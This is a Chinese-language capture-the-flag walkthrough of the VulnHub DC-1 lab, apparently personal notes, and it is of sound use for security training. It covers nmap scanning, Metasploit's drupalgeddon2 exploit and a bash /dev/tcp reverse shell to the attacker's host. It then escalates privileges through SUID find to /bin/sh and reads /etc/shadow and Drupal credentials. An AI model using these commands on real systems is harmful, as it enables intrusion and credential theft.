vulnhub DC-1
tmux kali命令窗布局
tmux split-window——划分上下两个窗格
tmux split-window -h——划分左右两个窗格
先kali用nmap探测ip
kali的ip:192.168.43.149
由于靶机用虚拟机搭建,它和kali在同一网段
nmap扫描:
1.nmap -sP 192.168.43.0/24或者使用arp-scan -l
探测该网段下存活的主机
最终发现dc1的ip:192.168.43.215
2.nmap -T4 -A -v -Pn 192.168.43.215
-T4表示速度
-A强力扫描
-v显示进度
-Pn绕过ping进行扫描,也就是禁止ping时进行扫描
3.nmap -sT --min-rate 10000 -p- 192.168.43.215
通过2、3命令探测到靶机开放的端口:22、80、111、50335
然后就是访问80端口,发现cms——drupal
看到这个cms的登录框,首先想到搜一下它的弱口令以及爆破,无果
用msfconsole,找一下这个cms可以利用的漏洞
1.search drupal
一个一个试,最终是:
2.use exploit/unix/webapp/drupal_drupalgeddon2
3.options
4.set LHOST 192.168.43.149
5.set RHOSTS 192.168.43.215
6.run
7.shell
算是进去了,可以执行一些命令
查看flag1.txt
这里明白了,以后要注意CMS的配置文件
cd sites/default
cat settings.php
配置文件里面有flag2
同时可以看到数据库的用户名和密码,根据flag2提示可以想到通过修改数据库,去修改CMS用户的密码从而登录
反弹个shell:
nc -lvp 5678
bash -i >/dev/tcp/192.168.43.149/5678 0>&1 2>&1
或者:
python -c 'import pty;pty.spawn("/bin/bash")'做个回显
账号:admin
密码:$S$DK8a6p.9BZ2hlNHj1itF5f1qJ1.BVXEHLaMY.ap1x0KM7l398CEt
find提权
which find
ls -l find的路径
如果有s则可以用find提权
find / -name test --exec "/bin/sh" ;
cat /etc/shadow
cd /root